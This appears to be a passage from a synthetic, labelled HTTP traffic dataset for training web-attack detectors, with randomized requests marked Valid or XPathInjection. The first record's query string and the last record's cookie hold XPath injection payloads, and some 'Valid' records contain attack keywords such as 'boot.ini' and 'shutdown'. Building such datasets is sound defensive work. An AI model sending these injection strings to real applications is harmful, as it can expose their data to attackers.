User-Agent: Mozilla/5.0 (X11; U; Open BSD i586 6.4; ie-uq; rv:8.9.0) Gecko/50939405
UA-CPU: PowerPC
UA-Disp: 6483,2331,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 846x8936
Via: HTTP/7.9 www.6eniefsn.html
Transfer-Encoding: deflate
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 1816915028
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16205
Start - Id: 49479
class: XPathInjection
GET /Jecho/cyeknleirs/lrd7npbSajheviAn/IwhereXrDM/QPAfOM/nnO9dK7Eg.htm?puooteit6t=qide3%2Ft%2Fij%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D482%5D++++%7C++++nbnmie%2Fg%2Fi1%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+++or+%27licuie%27++%3D++++%27&Idhssess=degtp4r&FCMC=iweT&r61mteyhtleae=mnr&snmka3z8ca=3PNQ.B HTTP/1.0
Host: www.wuae.biz:80
Connection: yed1yih
Accept: text/*, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: identity, deflate;q=0.4, compress, deflate;q=0.8
Accept-Language: S-cd0eei, 4aspeR-xom, oR9-t, iieJ6r9-a4;q=0.0
Cache-Control: max-stale
Client-ip: 39.79.55.113
Cookie: 0xe=rlrtv Mf3i5
Cookie2: $Version="297"
Date: Fri, 12 Aug 05 21:56:30 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Sun, 05 Dec 04 01:05:08 GMT
If-Unmodified-Since: Thu, 25 Mar 04 09:08:43 CET
If-Match: "kurkjzZ@4Dyqf.@H_B"
If-None-Match: *
If-Range: "yotgDv37yDFL6jWk"
Max-Forwards: 9
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic aXR1cTpoZHNyNw==
Authorization: NTLM ZWk1cWNlc2V1ZGUxYTFlRXRhbFVvb2RhNHVkbmVzSmJ0M3Zsag==
Range: -012
Referer: /Rd1srta/rrsIomn/ht0e.pdf
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/6.0 (Windows; U; WinNT 3.8; a9-id; rv:5.9.9) Gecko/78795271
UA-CPU: Sparc
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: bia54t/7.1 www.feJLtpr6.jpeg
Transfer-Encoding: compress
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49479
Start - Id: 16893
class: Valid
GET /SsKPGLpQ-2bBdV/wlPPmwmbbaiB0TCUBk/trabue/xefw13/e6/wgBJayn1msO/ttoldnnr.mdb?6t=evq56&tmrn2hhde=1&1ildlboot.inia4L5O3=aaix&rtdil=ySgis%25urascriptnldropualrn&telnetFQlvbscriptwcb=hT5yMiHJ HTTP/1.0
Host: 27.145.49.48
Connection: close
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: t-hysawo, 5y-Upc;q=0.2, ih-a, tTp-cdeie8ua, tr5tgS-n;q=0.2
Cache-Control: no-cache
Client-ip: 87.61.231.165
Cookie: enRneuana=wandr;tajxthioeirshe=sxml3]openoLexn;otlnezudksfsNc=aesoWaold9;2i=ltRe8ribas;mtaslprvtto3rc=boot.inihHgi/vns1h\;g4=oe
Cookie2: $Version="7"
Date: Sun, 10 Jan 10 22:51:22 GMT
ETag: W/"pAs53GLp9HssNJAKf5"
Expect: tlts=y0rseaba
From: yiuaci@ehiEp.org
If-Modified-Since: Fri, 16 Oct 09 02:10:29 UTC
If-Unmodified-Since: Sat, 06 Oct 07 10:33:11 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Dec 05 14:00:44 GMT
Max-Forwards: 6
MIME-Version: 7.3
Pragma: ectrssm=ttoo7sq
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: sddaao ipai6tc=osioeb
Range: -79,-459040
Referer: http://yoaNml.gov/4aoeaheq/jownX/snRaceh.nsf
TE: trailers,trailers
Trailer: Referer
User-Agent: nT2aaMsnYibiemy
UA-CPU: 68000
UA-Disp: 3594,2182,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: 7.5 122.65.69.132, HTTP/8.5 213.226.3.164:2, 8.5 www.L6ti.shtml
Transfer-Encoding: deflate
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 013 214.227.10.197 "wxgp" 
X-Forwarded-For: 144.164.88.102
X-Serial-Number: 81135810517
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16893
Start - Id: 5256
class: Valid
POST /blhO5slrre7elt/_MhttpsxJui2/humMntjw4v7A4N7-9IGx/EeoH/iJm/0czn3ryrdAaQAT/e3gOysd.aspx? HTTP/1.1
Content-Length: 262
Content-Language: glcs
Content-Encoding: identity
Content-Location: http://www.ainn.be/ognooDnt.mspx
Content-MD5: b25pbkVld2FHZW5zQnRtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Jan 10 13:11:37 UTC
Last-Modified: Sun, 27 Jun 04 09:16:27 CET
Host: 152.173.217.176:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-950, x-mac-korean
Accept-Encoding: compress, compress
Accept-Language: *;q=0.2
Cache-Control: max-stale=93001
Client-ip: 228.131.141.59
Cookie: feadse=N-MeAooeUsde;2cKVecK=h9ZpwxDN;aaxnunB=EIlulrHdo6d;ghcguoR=s/kt;yoaabret4atrrlh= 7;sdtts=071892051
Cookie2: $Version="80"
Date: Tue, 06 Jan 09 22:44:18 CET
ETag: W/"btSZNs.nyHnr3f0"
Expect: Nsdwtoa
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Thu, 01 Apr 04 20:59:01 CET
If-Unmodified-Since: Sat, 14 May 05 19:55:25 UTC
If-Match: *
If-None-Match: "GiKnAIkq477e6ZxE2j"
If-Range: Fri, 11 May 07 23:13:12 UTC
Max-Forwards: 4454
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="xtga"
Authorization: ae3eNM rlaaLi3e=rm1oust
Range: -061
Referer: http://baeew.uk/ttas/UTenue90.wmn
TE: trailers,chunked;q=0.3
Trailer: Trailer
User-Agent: osnnss2/2.9.7.7.9
UA-CPU: 68000
UA-Disp: 507,781,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4414x768
Via: HTTP/1.2 220.36.223.157, HTTP/5.9 www.4yhzs.tiff
Transfer-Encoding: identity
Upgrade: tMhm/1.0, C7euh/3.4
Warning: 074 www.sriv.html "e3cdl1yIlem" "Tue, 13 Feb 07 02:48:50 UTC"
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 76349451666157165
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

1t1eebeIza6hs=5218&a6hua4sfromYr.k=wtcn9Hdshro3whEa&sd3helo=wcledtapirq&anseaAaah6pv=52567766&T.Pu1iSR=7135264&0tchroi9etf=a.1__AFy@Of&rQnejoanRlSoas=tnVIHJ&aedytsetibe=aM0.HVwI&7spjoiat4Tmnjes=266441&attefa=gvs&yRstnea=65614527&iTnypnzbry=52388135&mt=<t[i

End - Id: 5256
Start - Id: 30226
class: Valid
GET /050/tutre9xbqtt/x1wpmXFivX/iretiYasewsi/eciml8eiian2sceG/lRu9/3tksge/YXNe.html?ailnRyo=oeun&xdsrimaEeoeg5ot=wroiiframeuh&rrSntpaMiktfsu=eepapt6e1c&rereiol8Rbb=%27frt%3Ex+l%5BztC%5Dyshutdowniq&wiieaialnaatcic=2ead%7C&ygot0g3aEasbfe=tanOn&OWFX6vguHFI=7&tir9c1OatEengyi=aanr&jwnsqoo=H%2Byl1cetceudN&YgbX=xuatgtlDe2duemoiel&hl8=eMI9CkPiRYJ&rse4ourh2=tt7lpiEcntiz&GAguiNszX79=5&c63cwoj6d=8720047 HTTP/1.1
Host: www.scGeF2ntYe.fr
Connection: close
Accept: text/*;q=0.5, application/postscript;q=0.3, application/rtf;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.6, gzip, identity;q=0.3, compress
Accept-Language: *;q=0.5
Cache-Control: min-fresh=72
Client-ip: 120.187.164.202
Cookie: tiljnsysbfoo=IaoptS8i2ioOdmocha; ;chttps;utHaerttea=5143;Hnon=ner asiframesi\phpb(  antj;r@7cAor=rcM.RA
Cookie2: $Version="0"
Date: Thu, 16 Sep 04 18:29:13 UTC
ETag: W/"qZR5zHuy_j.jpzx"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Tue, 04 Sep 07 03:29:24 CET
If-Unmodified-Since: Fri, 10 Apr 09 03:09:54 GMT
If-Match: "QKlCEZfF874wmitrk"
If-None-Match: "UidP9LY7mnJmpHfDPEjd"
If-Range: *
Max-Forwards: 904
MIME-Version: 2.9
Pragma: a=dNYzeew
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: NTLM ZzdCZGd6MHVSc29ubXRlY29kZ2xCaWVvYWl4cmRlcnNvaQ==
Range: 346642-698,469-394,8-
Referer: /uemoOc/jeeEVnr/ierdSfpE/lotsrhhr/odinrut5.exe
TE: trailers,gzip;q=0.9
Trailer: Authorization
User-Agent: oqWFWi http://www.tfoaIty.de
UA-CPU: Sparc
UA-Disp: 058,5611,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2607x1931
Via: FTP/6.2 www.raoauzL.jpeg
Transfer-Encoding: identity
Upgrade: rtW2/3.4, ohothc/2.6, cDbs/6.4, Evs/7.7
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 73.235.101.244
X-Serial-Number: 19194011026
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30226
Start - Id: 1529
class: Valid
GET /okscfii8ckinEt/fiN/hsOQ3Y/weha65bdhg/Ed8OajXqCEALg/mbvussehclt/olUenviotcb9z/nCYgX/h7bJ6viSwDWH467/mEG2c.png?odyu=pstdineO6Af%5D+Lallu&xN9eitodecaetw=utrlihsr%28euer&NEy=1503&bnSvNfUlIyitxlo=074 HTTP/1.0
Host: 160.10.207.122
Connection: keep-alive
Accept: application/zip, image/*, text/*
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 17.253.204.167
Cookie: saosilchri=tF|;hor0tisd=slink;@JR7qM=78287231
Cookie2: $Version="898"
Date: Tue, 07 Aug 07 12:52:37 GMT
ETag: W/"7r89idM5FjKBqZ7y7G"
Expect: saoeeUch
From: sctinh@65Ad.st
If-Modified-Since: Sun, 25 Feb 07 07:27:21 UTC
If-Unmodified-Since: Fri, 06 Oct 06 04:17:00 CET
If-Match: *
If-None-Match: "AUlLWbCH9W3oUZfyH"
If-Range: "who6oA6GCqUzMAP"
Max-Forwards: 0
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: hhusoe ikNaeuH=urUeewe
Authorization: Digest response="2e6ADaFC198Dd2acA54c57CE90A8c20C"
Range: -537132,4044-
Referer: http://rhu5mt.de/ej2ooic/Ufeis6/undbteo/dc5lGr.conf
TE: chunked,deflate;q=0.2,trailers
Trailer: Upgrade
User-Agent: b3mtrVf
UA-CPU: PowerPC
UA-Disp: 422,3598,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 066x2423
Via: 6.3 www.53nesn.tiff, HTTP/6.3 46.94.199.154, tshv/7.3 222.216.34.3:63
Transfer-Encoding: compress
Upgrade: istWg/6.0, 7rcd/3.8, oiVms/2.6
Warning: 991 www.eesu.js "hhept" "Wed, 03 Nov 04 11:47:33 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 83526
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1529
Start - Id: 18099
class: Valid
GET /9ugtSeOr/nU4RLudiDoYmKd/9HG/sisn7sgazttecuysjs/.gYOmmpApscopy/wPYGKiJcfysGHkmJxK9.png?eioltout3Ed=069601&bh8nO9Ae=+Notesaa%26randeo&fthiT=8roeo&hmeaifp9hNj=ersbte7o&t4cevHdn=6on&ou8iia6tattdnd=33293385&9idKw0body3RH=stlnfhp HTTP/1.1
Host: 78.80.187.208
Connection: close
Accept: video/mpeg, image/*;q=0.4, application/zip;q=0.6
Accept-Charset: iso-8859-15, shift_jis, windows-874;q=0.1, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 14.203.190.107
Cookie: fQEzd=yypiikp;2t=88476871;asabedjavsbbm= yltch  <us9
Cookie2: $Version="1"
Date: Mon, 03 Oct 05 07:33:17 UTC
ETag: W/"86O7RTuyA7fCKEv"
Expect: bncE=f0e5mD0;gaimk
From: oecjtte@aJits.ch
If-Modified-Since: Tue, 23 Nov 04 23:57:40 GMT
If-Unmodified-Since: Mon, 07 May 07 05:28:11 CET
If-Match: *
If-None-Match: "b-jadBvCJak2Nwu1e7"
If-Range: Thu, 29 Dec 05 21:31:18 CET
Max-Forwards: 87
MIME-Version: 8.3
Pragma: oxazy='1eb'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: ctaea hqet=a0ed1d
Range: -232
Referer: http://www.emoni.com/t41mbjde/aSt4ly/nwdeqjaf/rrytlveO/henor.asmx
TE: chunked;q=0.6,trailers
Trailer: Accept-Encoding
User-Agent: esengdmta/5.2.6
UA-CPU: MIPS
UA-Disp: 401,696,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 022x8341
Via: 6.8 www.rga8iwn.htm, FTP/1.5 www.ytes.html:40152
Transfer-Encoding: compress
Upgrade: triedg/0.8, sgneu/3.4, 95rs/2.7, tqU/0.4, shfsat/8.7
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 22.251.252.232
X-Serial-Number: 0963814403346136
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18099
Start - Id: 4283
class: Valid
PUT /iiecxith/1hbtGsbl/hYz1Lwnu/nkTeuEeosNCuHgEbhaNr/iekhp5todm/leolrRar/nmo6/0Pn/metaautoexec@.QpI/fW2b588BiqzFKP./ep.WeYILqRl_CYY/uLeaok7tdImJa6ajc8.aspx? HTTP/1.0
Content-Length: 50
Content-Language: uOlnT,Eihu,astMYra
Content-Encoding: compress
Content-Location: http://6eascnn.gov/ebnoL/6oohuLs/elroo7it/nyud/eddrx4tt.exe
Content-MD5: ZHdBZWFUaXV0b29lb3JpQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Sep 04 14:28:29 CET
Last-Modified: Thu, 20 Jul 06 23:40:52 UTC
Host: www.oane5eonut.st
Connection: sa9d
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: gIiln-n, u-0z;q=0.2, ytYe-z;q=0.6, c6lucse-EtdelEe2;q=0.2
Cache-Control: vRlLitl='d'
Client-ip: 214.181.125.246
Cookie: wlK=u;elAlwh=tan
Cookie2: $Version="6"
Date: Sat, 13 Mar 10 02:03:27 GMT
ETag: "Uv7Qocx@cE_rEtGAi5ZY"
Expect: 100-continue
From: d4tmdhbi@dApmaveH.gov
If-Modified-Since: Thu, 09 Nov 06 21:37:40 GMT
If-Unmodified-Since: Sun, 24 Jul 05 18:11:25 CET
If-Match: "w4si0tliVRcGnXUX"
If-None-Match: "OTI3j2A8JnPQT9KG"
If-Range: Wed, 30 Apr 08 15:32:17 GMT
Max-Forwards: 799
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic dGRsbmM6b2xneWNp
Authorization: Digest username="Odtta4eo"
Range: 557-
Referer: /hahhjCtn/wd0hhb.js
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.5 (X11; U; Linux i386 5.9; sa-se; rv:9.4.1) Gecko/21925067
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5153x5817
Via: 5.8 www.lSr9nl.html
Transfer-Encoding: gzip
Upgrade: Unh/4.4
Warning: 787 www.taikmdp.html:2894 "o4xcDruec" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 38250716672
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IfUDiy=qbJ1A3&2zatocweota=hhouneHq&n0ep7a3a3=35324

End - Id: 4283
Start - Id: 29905
class: Valid
GET /sdO.v4HniChsC/uCaolsosn/ai53sGtGkZ/rzwti6/ewinnt68rcopyjbdocumentxW/ptyE40it/erYxwEr7LGZQmYQvLeu/sirhbm/FSC1-UhrHbGgBpM/eFVJ_i9A7Q812gAiR3X/wo2ra4lss1eEairs.gif?enrnie44=beLhao&nin=jMH5xtla5s8&lt3=%28wjAi%26ni%26d0&nafTwmees=clEdd4tmw8l&4efloaltl=Z8Hta&vJHncE7.ixD=13229&gby=4047&noah=+&c5tdteDkadmh=470591028&ngyzmiNcN76th=csg3vat&EtondRdren=rrVsTwneIG&sor8=0817633&Iyr0fzTjmqle=367&ty8=scae%7Ckisloee&53eKiCosi=o0rcph HTTP/1.1
Host: www.wncu.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 135.83.9.29
Cookie: y0fr=ni;QvsPtGc69sTw=405;reddretlrweeu=sasasojefbodywp-];doDefrdfdpL=389
Cookie2: $Version="15"
Date: Mon, 12 Oct 09 08:45:11 CET
ETag: W/"7MRCAMCo4sZHzVITp"
Expect: 100-continue
From: mnafich@nsbersImyu.fr
If-Modified-Since: Fri, 28 Nov 08 15:50:03 GMT
If-Unmodified-Since: Wed, 12 Nov 08 10:53:17 GMT
If-Match: "V-53@BP8mwo4y946"
If-None-Match: *
If-Range: Sat, 28 May 05 05:33:13 CET
Max-Forwards: 8583
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Basic YWs4ZTpuYWtt
Range: 0255-,061871-
Referer: http://www.irrnrax.cz/gxnha9du/nasrt.msf
TE: gzip;q=0.9
Trailer: If-Match
User-Agent: Mozilla/4.3 (X11; U; Linux i386 0.5; Pe-eq; rv:1.3.6) Gecko/16901315
UA-CPU: PowerPC
UA-Disp: 5197,782,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3101x221
Via: 4.7 5.239.91.78, 1.4 www.onbMfq.htm, FTP/5.0 15.46.138.36
Transfer-Encoding: deflate
Upgrade: spt/3.7, rs8xQ/8.1, ovEla/6.7, hsp/5.3, ecaol/5.8
Warning: 601 103.90.185.56:00009 "bInvy9od2reoewohbO" "Thu, 26 Mar 09 12:32:40 UTC"
X-Forwarded-For: 221.63.83.226
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29905
Start - Id: 32444
class: Valid
GET /tU-D_6XL_mrcOGIAfm/aVdoQpIfiNV/aec8naieDza0nhne/2ettoopnfnuentw0adue.js?i5=f1noiht&herrer=xttdpassthrut3icsy3re4i&b0T9mftia=7036&saAjrnuE1=ossahicoh&2wlehdwxstldie7=6liEocSep%3F+ HTTP/1.1
Host: 189.24.118.146
Connection: hewepg
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nzhs-ate;q=0.3, Omacy-n, tN-to4ornha;q=0.6, tY-tapota;q=0.9
Cache-Control: max-age=6
Client-ip: 251.30.39.27
Cookie: Tsshutdown5= oiiexecioyUmu;beterara=a8R7a4stRpab5stt6;nzfEg=znyO<uaefes;IlOhnrt=DntnAntgnegaAf
Cookie2: $Version="005"
Date: Sun, 18 Sep 05 17:22:36 CET
ETag: "L@hxhH-RK5Ql4dG7"
Expect: benli
From: oi1hn4@aintRh.uk
If-Modified-Since: Tue, 22 May 07 06:45:23 CET
If-Unmodified-Since: Thu, 06 May 04 12:19:35 GMT
If-Match: "T1knbAeKQAZsPBa2I1"
If-None-Match: *
If-Range: "jxaao9nNoK-cUF_J9Xe"
Max-Forwards: 19
MIME-Version: 9.5
Pragma: Dd='t'
Proxy-Authorization: Basic bGVpRjpwZWFoZThvcw==
Authorization: Basic dHRtbWg6VEFuRQ==
Range: -618230,400-,832963-
Referer: http://ltDauHc.fr/onudaaia/iasf/enres/eNeoouuu.asmx
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.8 (Windows; U; Win 9x 8.4; ts-ty; rv:3.8.9) Gecko/93253542
UA-CPU: PowerPC
UA-Disp: 724,9778,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5048x521
Via: 3.5 www.iscYyvh1.html
Transfer-Encoding: tf7t
Upgrade: 1o0/3.7, s7dacb/4.7
Warning: 120 www.torwc6.shtml "mpfdt" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 824098
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 32444
Start - Id: 21171
class: Valid
GET /ie/7divmxHVj/0b/sBDqt7xpZ4UFPGJG/i6dmh/thInedeaa3oeoeTTw9/sDBxejdriefnNe.msf?etfAvMTbcsh=ttoc1&2KTN@Apb.51=wd&hof7mts8v7=lH1-8I3sg HTTP/1.1
Host: www.uocsUufat.uk:2332
Connection: impfhah
Accept: audio/*;q=0.0, video/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.9, gzip;q=0.2, gzip;q=0.9, compress
Accept-Language: eelrnh-Ore
Cache-Control: max-age=5
Client-ip: 255.8.84.163
Cookie: 6uxtcep= tarajophpatm;;pgl.jLy=e@bin-hahttps;Aesimd=fJzc6ia;Eo=dtfeeuasc5
Cookie2: $Version="71"
Date: Sat, 25 Aug 07 22:26:38 GMT
ETag: W/"HyDAkkNEsSuJ@7Ia9Dm"
Expect: 100-continue
From: aetfaus@nbciblTus.fr
If-Modified-Since: Thu, 31 May 07 16:39:27 UTC
If-Unmodified-Since: Sat, 14 Feb 04 04:18:51 UTC
If-Match: *
If-None-Match: "8NmfRIjR4OqjPHZ@n"
If-Range: Fri, 10 Nov 06 22:57:55 UTC
Max-Forwards: 2723
MIME-Version: 5.4
Pragma: e=EhEeg
Proxy-Authorization: Digest cnonce="sSwzouba"
Authorization: Digest algorithm=s3boRw2
Range: -888689,46910-
Referer: /dxhcns/ehalx/rsfalp/trad.cgi
TE: deflate;q=0.9
Trailer: Range
User-Agent: 4cieiaug2rjt1eirn
UA-CPU: PowerPC
UA-Disp: 1305,9206,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 402x543
Via: HTTP/6.1 www.jbao.jpg, ied/3.1 www.yelmw.tiff
Transfer-Encoding: gzip
Upgrade: aoN/9.8
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 208.104.152.221
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21171
Start - Id: 33708
class: Valid
PUT /uias3a/odOHMtF-rF/AsystemrVu9e4https/rlcqheiwaauoemd/cvzt0jj8DrpWb/qg1atA6rkroa5tRtk/ews.cfm? HTTP/1.1
Content-Length: 116
Content-Language: faopee
Content-Encoding: compress
Content-Location: http://lamNne.ch/d2eo/tTdmltee/laNopsnd/ithqe/e8wh.aspx
Content-MD5: ZGxtaXRucmljcnd1OGE4aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Nov 09 03:40:59 CET
Last-Modified: Mon, 12 Jan 04 18:33:59 UTC
Host: 56.20.228.84:80
Connection: close
Accept: image/jpeg;q=0.9, video/*, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 33.181.205.133
Cookie: es=eu8octonSf9 
Cookie2: $Version="27"
Date: Tue, 12 Oct 04 04:11:49 GMT
ETag: W/"OuCB_nSlEjkR3sVs"
Expect: oM4iit=9tedi
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Tue, 09 Nov 04 09:37:47 GMT
If-Unmodified-Since: Wed, 12 Sep 07 12:33:22 UTC
If-Match: "7E6uPtewKLAbCaP"
If-None-Match: "Fr@zhe2PbnQ3W@gHon"
If-Range: Fri, 24 Apr 09 14:56:34 GMT
Max-Forwards: 28
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: eiyE Yas0yi=RjsLiEa
Range: 521419-715172,4927-26503,-3630
Referer: /sctdlui.swf
TE: deflate
Trailer: If-Modified-Since
User-Agent: aWoWY3dnMx http://www.tNiE0f.net
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 340x5813
Via: A2yp/7.6 www.svlmg.jpg:84, 2.1 253.219.210.139:3
Transfer-Encoding: 3d0nm
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 235 108.148.231.217 "91iYeeeor3" 
X-Forwarded-For: 160.35.127.98
X-Serial-Number: 695598853636
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

geaw=odrEn0hceDw7oouol&01nwsi=:iD3@eavixlrt&in2uRdl=ewLA&nrs6e2ul=aid7Pnw\jceui&iaeBaiai=odFekrn&uxDltiri=1748

End - Id: 33708
Start - Id: 34408
class: Valid
POST /rxof2x/eqfCZKVmIPqOs9LgW@Eg/eLkQnO2/aeXmrnc/-oitelnet@/il8taip97mkr.aspx? HTTP/1.0
Content-Length: 66
Content-Language: x,pdto,erw
Content-Encoding: identity
Content-Location: /nees/3iefttt/3foj/Tssfo5o/ivsrjesn.dll
Content-MD5: ck5hZDFpZTNuOXZnc2FzbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Jun 08 02:42:45 GMT
Last-Modified: Tue, 28 Feb 06 23:13:48 UTC
Host: www.ghSlteSa.net
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.4, isiri-3342;q=0.1, windows-1250, x-mac-korean, iso-8859-2;q=0.2
Accept-Encoding: deflate, compress
Accept-Language: 0se9e-crisec;q=0.0
Cache-Control: max-stale
Client-ip: 98.127.115.183
Cookie: s7jnm=vj;xx1wW98Z=86
Cookie2: $Version="306"
Date: Sun, 13 Apr 08 22:20:08 UTC
ETag: W/"aerdtqIKkG9Ie3V6"
Expect: 2eeyntN
From: sguefot@nd3dact2t0.ch
If-Modified-Since: Mon, 26 Dec 05 07:19:22 CET
If-Unmodified-Since: Thu, 10 Jul 08 09:43:52 CET
If-Match: *
If-None-Match: "YptL3vtkr56ly8z"
If-Range: Thu, 08 Nov 07 16:03:09 GMT
Max-Forwards: 236
MIME-Version: 8.4
Pragma: dm=iE
Proxy-Authorization: NTLM NWd0dmF3b3Jmb0x0ZGliaXdtcG91bnNoZWxzaHJkbW9taGFkbjZnbXQ3dA==
Authorization: NTLM b3N5ZHR0ZWFpcHVkZzhuMGVpNnJmc21lbm43aG1sZWEyaDRoZnhaYWx0ZG41Nmxo
Range: 1872-
Referer: http://www.henPn.be/cBoieM/rhc2id/efiaaeu/Uha7.nsf
TE: chunked;q=0.0,chunked,gzip;q=0.6
Trailer: Trailer
User-Agent: i8nh/1.9
UA-CPU: StrongARM
UA-Disp: 8099,2582,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 995x932
Via: 7.5 www.ttSO.png
Transfer-Encoding: deflate
Upgrade: ovAeer/6.4, irvwrQ/0.5, snd8l/4.6, ann/7.0
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 0048191065626142510
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

us=eloen hu;=ofiLrbr9i&oYNaQlmKb=gj_pvgOZmJCA&oBdYkCxF7D-_=t-i

End - Id: 34408
Start - Id: 48477
class: XPathInjection
GET /2amtut3unc7koejticiR/rs/ibA/nEEBeWX@/ivJIyp1Cny.R/ehna2ntirv.png?eewtmoidbI9=e0fgP%40Y&oeinfqNw=74&Hsn=sieoyup&enTdder=nhs HTTP/1.1
Host: www.nprtt.org
Connection: close
Accept: text/plain
Accept-Charset: utf-7;q=0.6, x-mac-arabic;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: oen-ty2a;q=0.9, Rwarnue-l6h;q=0.6
Cache-Control: max-stale=35
Client-ip: 8.102.172.5
Cookie: on=516    or  count(path/child::node()[position()=((i+j+k+l+1)]  |     path/child::*()[position()=(k+1)])=1   or  303=;eriRoarno8t=s;lepacrjlnoaqe=Aopte
Cookie2: $Version="1"
Date: Tue, 20 Dec 05 08:33:21 GMT
ETag: W/"MaL2lrd5r17B8r42"
Expect: 100-continue
From: xwmo0O@eRPai1tmd.cz
If-Modified-Since: Tue, 27 Jun 06 17:06:55 GMT
If-Unmodified-Since: Mon, 16 Oct 06 21:04:42 GMT
If-Match: "tdR@Ip_1nujKYvSaTgTh"
If-None-Match: "XYpU93TBK2D2fQL.NDz"
